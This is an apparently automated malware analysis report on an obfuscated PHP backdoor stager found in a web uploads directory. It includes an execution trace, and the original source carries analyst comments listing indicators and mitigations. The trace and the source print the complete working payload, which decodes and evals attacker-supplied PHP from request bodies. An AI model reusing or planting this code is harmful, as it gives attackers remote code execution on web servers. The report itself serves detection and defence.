PHP Malware Analysis

cgi-conf.php

md5: 85556c493e5c9d78e60a09f78731904d


Screenshot


Attributes

Encoding

Execution

Files

Input


Deobfuscated PHP code

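Failed to deobfuscate code. The fully assembled payload is nonetheless visible in the execution trace below, as the return value of the second str_replace call.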

Execution traces

data/traces/85556c493e5c9d78e60a09f78731904d_trace-1676238824.0298.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:54:09.927613]
1	0	1	0.000137	393528
1	3	0	0.000197	396464	{main}	1		/var/www/html/uploads/cgi-conf.php	0	0
1		A						/var/www/html/uploads/cgi-conf.php	2	$N = 'k>{$j>};}}r>eturn $o;>}if> (@preg_>match(>"/$kh(.+)$k>f/",@f>ile>_get>_conte'
1		A						/var/www/html/uploads/cgi-conf.php	3	$W = 'base>64_decode(>>$m[1]),$k)))>;$>o>=@ob_get_co>ntents();@>ob_en>d>_clean()'
1		A						/var/www/html/uploads/cgi-conf.php	4	$u = 'nt>>s("php://input>"),$m)>==1) {@>ob>_start>();@eva>l(>@gzuncom>press(@x(>@'
1		A						/var/www/html/uploads/cgi-conf.php	5	$p = 'or($i=0;>$i><$l>;>){for($j=0;>(>$j<$c&&$i>><$l);$j++,$i+>+){$o.=$t{$i>}^$'
2	4	0	0.000297	396464	str_replace	0		/var/www/html/uploads/cgi-conf.php	6	3	'uX'	''	'cuXruXeauXte_uXfunuXcuXtion'
2	4	1	0.000314	396600
2	4	R			'create_function'
1		A						/var/www/html/uploads/cgi-conf.php	6	$g = 'create_function'
1		A						/var/www/html/uploads/cgi-conf.php	7	$C = ';$r>=@bas>e6>4_encod>e(@x(@gz>com>p>ress($o),$k));p>rin>t("$p$k>h$r$kf");}'
1		A						/var/www/html/uploads/cgi-conf.php	8	$Y = '9FiQ>Alp>";functio>n x($t,>>$k>){$c=strl>e>n($k);$l=strlen($t);>$o=>"";f'
1		A						/var/www/html/uploads/cgi-conf.php	9	$r = '$k="b5ef7>3cd";$>kh="5>>ce24f92>1bbc";>$k>f="7fa689200f>f0>";$p="aOWo2>okBR>'
2	5	0	0.000386	397144	str_replace	0		/var/www/html/uploads/cgi-conf.php	10	3	'>'	''	'$k="b5ef7>3cd";$>kh="5>>ce24f92>1bbc";>$k>f="7fa689200f>f0>";$p="aOWo2>okBR>9FiQ>Alp>";functio>n x($t,>>$k>){$c=strl>e>n($k);$l=strlen($t);>$o=>"";for($i=0;>$i><$l>;>){for($j=0;>(>$j<$c&&$i>><$l);$j++,$i+>+){$o.=$t{$i>}^$k>{$j>};}}r>eturn $o;>}if> (@preg_>match(>"/$kh(.+)$k>f/",@f>ile>_get>_content>>s("php://input>"),$m)>==1) {@>ob>_start>();@eva>l(>@gzuncom>press(@x(>@base>64_decode(>>$m[1]),$k)))>;$>o>=@ob_get_co>ntents();@>ob_en>d>_clean();$r>=@bas>e6>4_encod>e(@x(@gz>com>p>ress($o),$k));p>rin>t("$p$k>h$'
2	5	1	0.000419	397752
2	5	R			'$k="b5ef73cd";$kh="5ce24f921bbc";$kf="7fa689200ff0";$p="aOWo2okBR9FiQAlp";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/cgi-conf.php	10	$k = '$k="b5ef73cd";$kh="5ce24f921bbc";$kf="7fa689200ff0";$p="aOWo2okBR9FiQAlp";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2	6	0	0.000475	397016	create_function	0		/var/www/html/uploads/cgi-conf.php	11	2	''	'$k="b5ef73cd";$kh="5ce24f921bbc";$kf="7fa689200ff0";$p="aOWo2okBR9FiQAlp";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3	7	0	0.000556	405056	{internal eval}	1		/var/www/html/uploads/cgi-conf.php	11	0
3	7	1	0.000571	405056
3	7	R			NULL
2	6	1	0.000585	403688
2	6	R			'\000lambda_5'
1		A						/var/www/html/uploads/cgi-conf.php	11	$G = '\000lambda_5'
2	8	0	0.000613	403624	__lambda_func	1		/var/www/html/uploads/cgi-conf.php	11	0
2		A						/var/www/html/uploads/cgi-conf.php(11) : runtime-created function	1	$k = 'b5ef73cd'
2		A						/var/www/html/uploads/cgi-conf.php(11) : runtime-created function	1	$kh = '5ce24f921bbc'
2		A						/var/www/html/uploads/cgi-conf.php(11) : runtime-created function	1	$kf = '7fa689200ff0'
2		A						/var/www/html/uploads/cgi-conf.php(11) : runtime-created function	1	$p = 'aOWo2okBR9FiQAlp'
3	9	0	0.000673	403680	file_get_contents	0		/var/www/html/uploads/cgi-conf.php(11) : runtime-created function	1	1	'php://input'
3	9	1	0.000693	404416
3	9	R			''
3	10	0	0.000706	404400	preg_match	0		/var/www/html/uploads/cgi-conf.php(11) : runtime-created function	1	3	'/5ce24f921bbc(.+)7fa689200ff0/'	''	NULL
3	10	1	0.000755	404560
3	10	R			0
2	8	1	0.000770	404320
1	3	1	0.000778	404320
			0.000803	321704
TRACE END   [2023-02-12 19:54:09.928308]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
// ANALYST NOTES (annotation only; every statement below is unchanged).
//
// Purpose: obfuscated stager for a request-driven backdoor. It rebuilds a PHP
// payload from string fragments and runs it via create_function(), so the
// names create_function, eval and preg_match never appear contiguously in the
// file on disk and simple keyword scans miss them.
//
// Assembled payload, as shown by the trace's second str_replace return value:
//   - reads the raw request body from php://input;
//   - looks for data wrapped between the markers $kh and $kf;
//   - base64-decodes it, XORs it with the repeating key $k (helper x()),
//     gzuncompress()es it and eval()s the result;
//   - captures the output with output buffering, then gzcompress()es, XORs
//     and base64-encodes it and prints it as $p . $kh . data . $kf.
// Every call in the payload is prefixed with "@", so errors are suppressed.
//
// Indicators taken from this sample: the marker strings 5ce24f921bbc and
// 7fa689200ff0 and the prefix aOWo2okBR9FiQAlp, in request bodies or
// responses; a PHP file executing from an uploads directory (path per trace).
// Mitigation: deny script execution in upload directories and alert on
// create_function/eval reached through str_replace-built strings.
//
// Compatibility: create_function() was removed in PHP 8.0 and the payload's
// curly-brace string offsets ($t{$i}) are also rejected by PHP 8, so this
// sample only runs on older interpreters.
// NOTE(review): the layout resembles the publicly documented Weevely agent;
// confirm against existing signatures before attributing.

// Payload fragments. They are assigned out of order and padded with the
// filler character that line 89 strips, so no fragment is readable alone.
$N='k>{$j>};}}r>eturn $o;>}if> (@preg_>match(>"/$kh(.+)$k>f/",@f>ile>_get>_conte';
$W='base>64_decode(>>$m[1]),$k)))>;$>o>=@ob_get_co>ntents();@>ob_en>d>_clean()';
$u='nt>>s("php://input>"),$m)>==1) {@>ob>_start>();@eva>l(>@gzuncom>press(@x(>@';
$p='or($i=0;>$i><$l>;>){for($j=0;>(>$j<$c&&$i>><$l);$j++,$i+>+){$o.=$t{$i>}^$';
// Removing the 'uX' filler yields the string 'create_function' (see trace).
$g=str_replace('uX','','cuXruXeauXte_uXfunuXcuXtion');
$C=';$r>=@bas>e6>4_encod>e(@x(@gz>com>p>ress($o),$k));p>rin>t("$p$k>h$r$kf");}';
$Y='9FiQ>Alp>";functio>n x($t,>>$k>){$c=strl>e>n($k);$l=strlen($t);>$o=>"";f';
// This fragment carries the key, both markers and the start of the prefix.
$r='$k="b5ef7>3cd";$>kh="5>>ce24f92>1bbc";>$k>f="7fa689200f>f0>";$p="aOWo2>okBR>';
// Reassemble the fragments in their real order and strip the filler; $k now
// holds the complete payload source as a string.
$k=str_replace('>','',$r.$Y.$p.$N.$u.$W.$C);
// create_function('', $k) compiles the string as the body of an anonymous
// function (the trace shows an internal eval) and returns its name; $G()
// then runs it. In the traced run the request body was empty, preg_match
// returned 0 and the eval branch was never reached.
$G=$g('',$k);$G();
?>